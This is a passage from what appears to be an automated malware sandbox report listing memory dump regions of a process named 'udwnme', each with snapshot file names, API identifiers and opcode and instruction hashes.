                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: DispatcherExceptionUser
                                                                    • String ID:
                                                                    • API String ID: 6842923-0
                                                                    • Opcode ID: 59446ed96e9321030cb2cae62c5b58fa7d9bd8ea78aaa2278af30046c61e2c3d
                                                                    • Instruction ID: 5fa63eb1f1e7e99b2f48826cc41fbc1388486cfd49c4f4a97fdc73a97ebda859
                                                                    • Opcode Fuzzy Hash: 59446ed96e9321030cb2cae62c5b58fa7d9bd8ea78aaa2278af30046c61e2c3d
                                                                    • Instruction Fuzzy Hash: 55E03936901634DFCB26DB94E958BEDF375FBA4311F51A132C40A576848B306892CF81
                                                                    APIs
                                                                    • KiUserExceptionDispatcher.NTDLL ref: 05400A89
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: DispatcherExceptionUser
                                                                    • String ID:
                                                                    • API String ID: 6842923-0
                                                                    • Opcode ID: d5ea1bef9befa3d59d163a2472069043e012978de8a2b4d0dae7f3ef685b60c9
                                                                    • Instruction ID: 482aabfc9be36cd33ee7327439849635d798240f6a105209aad0ce6d4450b494
                                                                    • Opcode Fuzzy Hash: d5ea1bef9befa3d59d163a2472069043e012978de8a2b4d0dae7f3ef685b60c9
                                                                    • Instruction Fuzzy Hash: 31E01A32901A34DBCB25CB84E9587EDB3B5FB94311F509132C44A57584C7306992CF80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: ff8d2a03b70cac40c2e2e456d230027cedcb52ce73fa5da9b7167392c355fe9d
                                                                    • Instruction ID: ae1fa4e1313724379f7963c52571c9e299011f6ffce7ff3669e3911295e023f2
                                                                    • Opcode Fuzzy Hash: ff8d2a03b70cac40c2e2e456d230027cedcb52ce73fa5da9b7167392c355fe9d
                                                                    • Instruction Fuzzy Hash: A6518370E0060A8BCB15DF69C95459EBBB2FF85300F20852ED816AB365DB34AD46CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 6478bcceef16a51ca33605290d62e02b1077ba81602b4b979744431f018155e0
                                                                    • Instruction ID: 28f7f24a4e1422fd7920c4467e02fef4eea5cc9603fb02f1fb2e36c35e85b64b
                                                                    • Opcode Fuzzy Hash: 6478bcceef16a51ca33605290d62e02b1077ba81602b4b979744431f018155e0
                                                                    • Instruction Fuzzy Hash: 3B41A270E006068FCB19DFB9C95459EBBB2FF95300F20856ED416AB365DB34AD46CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 39ccc7da0ee5e04a968de2bdd473953c690e1a6fb58e85109d8dd3805fd8b737
                                                                    • Instruction ID: 7f3c627fec85f83caccb654742bdd97bc16c940fb76070e7c9b04ef8b2b386bb
                                                                    • Opcode Fuzzy Hash: 39ccc7da0ee5e04a968de2bdd473953c690e1a6fb58e85109d8dd3805fd8b737
                                                                    • Instruction Fuzzy Hash: 28419070E0060A8FC719DFB9C95459EBBB2BF99304F20856ED416AB365DB34EC46CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 1e51ca77deb2ef376e180c83ef4c5f70d571eece29dd914af3d2c651f7457665
                                                                    • Instruction ID: bdcbea7b76c0ff43a73193a27c5e03bb7c27d46a8cc345078f51a9f554e057cd
                                                                    • Opcode Fuzzy Hash: 1e51ca77deb2ef376e180c83ef4c5f70d571eece29dd914af3d2c651f7457665
                                                                    • Instruction Fuzzy Hash: 53418271A006068FC719DF69C99459EBBB2FF95300F20852ED416AB365DF34ED46CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 013cc4b3faadc8cab434414f502c6b4bff517c108ceb8f9fb7284c1d649d22f9
                                                                    • Instruction ID: 9f0f1a106902a20e86dccff1deb076d588e01d88e9eecd28aaf25074e08eb3a2
                                                                    • Opcode Fuzzy Hash: 013cc4b3faadc8cab434414f502c6b4bff517c108ceb8f9fb7284c1d649d22f9
                                                                    • Instruction Fuzzy Hash: 9631B170F002168FCB58EBB985509AFBBF6BF89610B14416ED516EB3A4EE349C42C791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: ee89dca85938d894f1729f0e4ba1ba0028962a371a0f618bc6a21406e3d1a0f7
                                                                    • Instruction ID: f3c0d727610cda31da69003141d174dce7df04c1e4d770020a4888e9a7f357bd
                                                                    • Opcode Fuzzy Hash: ee89dca85938d894f1729f0e4ba1ba0028962a371a0f618bc6a21406e3d1a0f7
                                                                    • Instruction Fuzzy Hash: 5631A375A002058FDB15DF69C498AEEBBF2FF48700F1485AAE405AB3B1CB749D45CB51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: 44fd0ce9f1c35142539c702b99ddd70a9823f9d32ae350037fe454de5078db4f
                                                                    • Instruction ID: cce1067b2109c5c09b1323e075750b5fc977e69238935dbd053038aec5e04929
                                                                    • Opcode Fuzzy Hash: 44fd0ce9f1c35142539c702b99ddd70a9823f9d32ae350037fe454de5078db4f
                                                                    • Instruction Fuzzy Hash: 5AF0F4347082804FC38A573D64205AE3FE6AFDB25031944FAD14ACB3A6CD294C07C7A1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf74ed9cd997f74be30fffc4ba4b6b025f0803de280f59e077478c4d668a0b37
                                                                    • Instruction ID: ed9908a5bb12a1fb758e7cf2915256e243d1a2fdb459744040b66e450c89be7a
                                                                    • Opcode Fuzzy Hash: cf74ed9cd997f74be30fffc4ba4b6b025f0803de280f59e077478c4d668a0b37
                                                                    • Instruction Fuzzy Hash: 3D72ABB1E102198FDBA8DBA4C9547DEBBB6BF88300F1040A9D14A6B3A4DF345E85DF51
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f51dd45fbe6d9d975a4da1e2f33dc54b6bdea06d3f7e1cfa556e00a8289f696a
                                                                    • Instruction ID: cdf95e996c8f0afec0925b2ec6f203e74e3db853e20d5c53c97564cc10eb1fe3
                                                                    • Opcode Fuzzy Hash: f51dd45fbe6d9d975a4da1e2f33dc54b6bdea06d3f7e1cfa556e00a8289f696a
                                                                    • Instruction Fuzzy Hash: 8172ABB1D102198FDBA8DBA4C9547DEBBB6BF88300F1040A9D24A6B3A4DF345E85DF51
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9e80c79e9dc86198c1e4871bc23df3b696bfeb826f4dd2892fb659af0f1d12f
                                                                    • Instruction ID: 5c0dcea0fa12338bb693ac4607916507d4a91b1cfe2a2f28802b6e0f0d0b0b77
                                                                    • Opcode Fuzzy Hash: a9e80c79e9dc86198c1e4871bc23df3b696bfeb826f4dd2892fb659af0f1d12f
                                                                    • Instruction Fuzzy Hash: 2BB1D574B093854FCB02DB74D9A45EDBFB2EF8A210B1988D7C4419B3A7DA385C46CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b6500f37b551b6baf90fb1c2dc5b1a6feeb8ac60b503742498f85e7a5d30afd
                                                                    • Instruction ID: fc164080e12c59b4062b65916838453faaba0c83472ce367d4fc4f9b6ae2cb7d
                                                                    • Opcode Fuzzy Hash: 1b6500f37b551b6baf90fb1c2dc5b1a6feeb8ac60b503742498f85e7a5d30afd
                                                                    • Instruction Fuzzy Hash: 7BB13F70E00609CFEB10CFA9D9857DEBBF2AF48714F15812AD818E7364EB749845CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 83a0ada3478db82f087d53920fc3badb35d9f908850227ef27fd0f5549837736
                                                                    • Instruction ID: 3796856ea8ab3e13624b2d8f7cc630361a771b8626ddcc64a27dfc48be27f35d
                                                                    • Opcode Fuzzy Hash: 83a0ada3478db82f087d53920fc3badb35d9f908850227ef27fd0f5549837736
                                                                    • Instruction Fuzzy Hash: 04617271F002159FDB05DBB8C540AAEBBF6AF88314F248169D4559B3A6DB31EC42CB94
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85284d28f31607dfe946bde41ed84b31dc5b7289c0edaa4b2a18acfc4b25f9c4
                                                                    • Instruction ID: cd0c671a48d30ffdf6d9672110f2ceea2f94a373d5fcacba9e1f8755684a7982
                                                                    • Opcode Fuzzy Hash: 85284d28f31607dfe946bde41ed84b31dc5b7289c0edaa4b2a18acfc4b25f9c4
                                                                    • Instruction Fuzzy Hash: 9D61B734F0420ACBCB58DFB4F5AC56E77B2FB85341B509969D412AB3E8DA385C42DB81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 210b1583cca9b4e09010e6c42d4edfd6e2b0b53e354eba5672a475d106efb33c
                                                                    • Instruction ID: 776d272dfd75b4fc98381b834165fbef349345d8488d2905951b64058d3a7079
                                                                    • Opcode Fuzzy Hash: 210b1583cca9b4e09010e6c42d4edfd6e2b0b53e354eba5672a475d106efb33c
                                                                    • Instruction Fuzzy Hash: FF51B270B102159FCB1A9FB8D45475E7BB7EF88300F14846AE945EB3A4CF789C829B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Instruction ID: 95487f7bf5ff53fc9905e0767181826fb5988a0377df9baf396d31b1e280c594
                                                                    • Opcode Fuzzy Hash: a9cb58fb55b9dbcb8461b50e300077fc5cb9e9a7719ac4af632a78caad03082b
                                                                    • Instruction Fuzzy Hash: 2031A030E0175ADBCB14CFA5C54059EFBB6FF88314F20862AD8056B258EB74A886CBC0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c58720c7c323795d3208bb81c9bcdb32fa24bb19e58486babf4c586325f59a2
                                                                    • Instruction ID: 2ab6757ca9cacc75ead60ac6163af4fd0e9af09803d0ca78b4930f8ed6329477
                                                                    • Opcode Fuzzy Hash: 7c58720c7c323795d3208bb81c9bcdb32fa24bb19e58486babf4c586325f59a2
                                                                    • Instruction Fuzzy Hash: 8141EEB1D0034D9FDB10DF99C584ADEBFB5FF48310F20842AE809AB264DB75A946CB90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9efe32159ced412957f00094a554c9c0e020f4e6f1878a3b8a1ae415fc63e304
                                                                    • Instruction ID: 0c0f1e41296d2d8696e0aa922bc399f662a7242f2cfb45933185b71c612c8a74
                                                                    • Opcode Fuzzy Hash: 9efe32159ced412957f00094a554c9c0e020f4e6f1878a3b8a1ae415fc63e304
                                                                    • Instruction Fuzzy Hash: F031C734F4420B8BCF98DF74F5AC57EB7B2FB85241B508929D412A73A8DE385C429B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0478e25a9a71ca62ceedf1d0f8ba484edf58dffe080f36b12ae5e431ec05d9e
                                                                    • Instruction ID: a52c47c767fdae16803589f8f6f69b884acd47b9d86738d5ad03b37c4eb0f8ee
                                                                    • Opcode Fuzzy Hash: a0478e25a9a71ca62ceedf1d0f8ba484edf58dffe080f36b12ae5e431ec05d9e
                                                                    • Instruction Fuzzy Hash: CB316D70B002168FCB01EFA9D490ADEBBF2FB98210F10466ED509F7351DB359C458B90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12967ef9c48f24c46670474c604d7cc25dbaf07807b9c81fef31efb29c901b30
                                                                    • Instruction ID: 130365288cd82538ab16add3a7dd2056755de8e715a10da1a11189172d6a1c95
                                                                    • Opcode Fuzzy Hash: 12967ef9c48f24c46670474c604d7cc25dbaf07807b9c81fef31efb29c901b30
                                                                    • Instruction Fuzzy Hash: 4F317EB0702342CFEB75AB79D5193AB7BF9AB56305F04402AE846C72E5DB34C941CB51
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 909aef108ba1e52e93ffd3b181363d634f0ad661bd942363b3a7e06f5c60b3b1
                                                                    • Instruction ID: 504224c16284fa9469645aab4b2e035df35197ff4c728e84c9620dba4a916e07
                                                                    • Opcode Fuzzy Hash: 909aef108ba1e52e93ffd3b181363d634f0ad661bd942363b3a7e06f5c60b3b1
                                                                    • Instruction Fuzzy Hash: 622182B07113028BFB75AB79D9193AB7AE9AB55305F00442AE807C72E9EF34C441CB61
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 98f900412c07f7eab4d8b1db2d6905dd8ca8d34a16151a6dca0d766752534252
                                                                    • Instruction ID: bbb6066de92a14daf4daf36ee596b89599c580ace64ce43c604e32c432871276
                                                                    • Opcode Fuzzy Hash: 98f900412c07f7eab4d8b1db2d6905dd8ca8d34a16151a6dca0d766752534252
                                                                    • Instruction Fuzzy Hash: E931A774E01209DFCB04DFB4D6905AEBBB2EF89701F108579C516A7364EB395E82CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 714003c13397b96f4e9790581c897f18ee480b8f9769828186a0634522b0f4fb
                                                                    • Instruction ID: becaf0ea99dfc8628bcac6bd9c08c94a9018c34cb557357564b6857cb2da1ce0
                                                                    • Opcode Fuzzy Hash: 714003c13397b96f4e9790581c897f18ee480b8f9769828186a0634522b0f4fb
                                                                    • Instruction Fuzzy Hash: 2531A634F4420B8BCF88DF64F6AC57EB772FB85241B509969D812673A8DE385C429B81
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38a54d02fcd105911d08182ee6e2247c76e233ea6a30e3d9af517e2b86ecc0b6
                                                                    • Instruction ID: e246e985dc211924a7dd7c710ab5dad97dbf209540398c9e0e2bec676bb71127
                                                                    • Opcode Fuzzy Hash: 38a54d02fcd105911d08182ee6e2247c76e233ea6a30e3d9af517e2b86ecc0b6
                                                                    • Instruction Fuzzy Hash: 3A311A75F402188BCF049FA5E9586BEFBF6FB88351F05442AE806E7380DB349D518B90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a16604df6acc24a718011a3558230cef06e00c436d1652d89b7a7615169fc8a6
                                                                    • Instruction ID: 0b68b1f854a34ddab09f5b234da40e9e835eebe073aca88553954362f0eae8ea
                                                                    • Opcode Fuzzy Hash: a16604df6acc24a718011a3558230cef06e00c436d1652d89b7a7615169fc8a6
                                                                    • Instruction Fuzzy Hash: AB318874E01209DFCB04DFB4D6905AEB7B6EF88701F108579C516A7364EB399E82CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df96746bec1d77c5553887baaead0a3b5417810ac934434be35c74d2011e7773
                                                                    • Instruction ID: cac385f53e234df866a3b96172869b1cca56eb5ab72a195b55999f46d453d41d
                                                                    • Opcode Fuzzy Hash: df96746bec1d77c5553887baaead0a3b5417810ac934434be35c74d2011e7773
                                                                    • Instruction Fuzzy Hash: B2214B71F402188FCF059FA998486BEFBF2FB88351F05442AE90AE7340DB349C518B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5999bbccef9869ac659891e7e8e35a52a40df2369bb2327ffd27e71bfdf25694
                                                                    • Instruction ID: c3cb82d8ec0d8619c339849add76474409ca7ae0adac4bb9e16277450303abf2
                                                                    • Opcode Fuzzy Hash: 5999bbccef9869ac659891e7e8e35a52a40df2369bb2327ffd27e71bfdf25694
                                                                    • Instruction Fuzzy Hash: 3A31FDB0D0020A8FCB45DFA4D8545AEBBB2FF84304F108569D5117B2A4DF385E85CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2916612593.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_11dd000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b33e12e74e77305493fdc7c41e19fb80425d3153e7ef0a33af81a654144b4fcd
                                                                    • Instruction ID: 84adf1aafc49adacfba69c661c5a0b468cceec839eb22e51e9da9f0e041d31cf
                                                                    • Opcode Fuzzy Hash: b33e12e74e77305493fdc7c41e19fb80425d3153e7ef0a33af81a654144b4fcd
                                                                    • Instruction Fuzzy Hash: D82106B1504200DFDF19DF98E9C0B26BF75FB84318F64C569E9094A296C336D456CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1b487174623fcbf2a5147db7fdf68236699307dece7b59bb6f99982071e6947
                                                                    • Instruction ID: 5256297cab060de27779175ded2b2f8d76c58ca4e3c7ec598e77f89a8c0b125e
                                                                    • Opcode Fuzzy Hash: d1b487174623fcbf2a5147db7fdf68236699307dece7b59bb6f99982071e6947
                                                                    • Instruction Fuzzy Hash: 99212C71E002088FCF059F69D9885AEFBF6FB88350B05842AD906E7350EB749D518B90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 320d0399df5326959aaa8e276d2f0493aec8d6c30545449b19248741f9d72a6a
                                                                    • Instruction ID: 21be828b61db4e8192f236141b2b8bb1312c41ea6cb0c7741e3211180cf45ec8
                                                                    • Opcode Fuzzy Hash: 320d0399df5326959aaa8e276d2f0493aec8d6c30545449b19248741f9d72a6a
                                                                    • Instruction Fuzzy Hash: B0114FB1B102165BCB48EBF9485836FBAEAFFD9650B20442ED65AD7384DE348C0187E1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8fe76f8732fd72843779357f3ec302c317bdd8d6bb2e902f7de74d1e92610521
                                                                    • Instruction ID: 4b9b1dc2af1bdae6f65d02b1a5e8aebe2187adf1cbc1cfcfcf1caf210db317b0
                                                                    • Opcode Fuzzy Hash: 8fe76f8732fd72843779357f3ec302c317bdd8d6bb2e902f7de74d1e92610521
                                                                    • Instruction Fuzzy Hash: C1213875E0011A8BCB10DFADE880AEFF7B5FB88310F108166D929A7365D734E9468B90
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e37c9f02ecf07d784d48569befd99307b7844bae5b21121abbb06365e1217f91
                                                                    • Instruction ID: 52742d902fc58b31be36ad280763fa5aec5a612b98d42115ccde952b90c7c26d
                                                                    • Opcode Fuzzy Hash: e37c9f02ecf07d784d48569befd99307b7844bae5b21121abbb06365e1217f91
                                                                    • Instruction Fuzzy Hash: C9219371E1035ADBCB14CFA5C8845EEFBB1BF99340F148A1AE401BB240EBB06995CB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fed1ac51a965400e57ea574c456056c84b8f28d7bfab77d68dfae97947172839
                                                                    • Instruction ID: fd45c80af9788e6d426f73a71d8d2e44a06958bc01bf5bf784f08f6a6512d269
                                                                    • Opcode Fuzzy Hash: fed1ac51a965400e57ea574c456056c84b8f28d7bfab77d68dfae97947172839
                                                                    • Instruction Fuzzy Hash: 3D210CB1D0020A8FCB45DFA4D854AAEBBB2FF88304F108569D1157B3A4DF385E89CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8121c03490c2d01c76ec5a804262486c03c8d509c0a5856cf8a40928294c2da2
                                                                    • Instruction ID: edb8ba6dc1b685d53d993916053f3e71cdf9b7c5f2ae73363c366132b4577e39
                                                                    • Opcode Fuzzy Hash: 8121c03490c2d01c76ec5a804262486c03c8d509c0a5856cf8a40928294c2da2
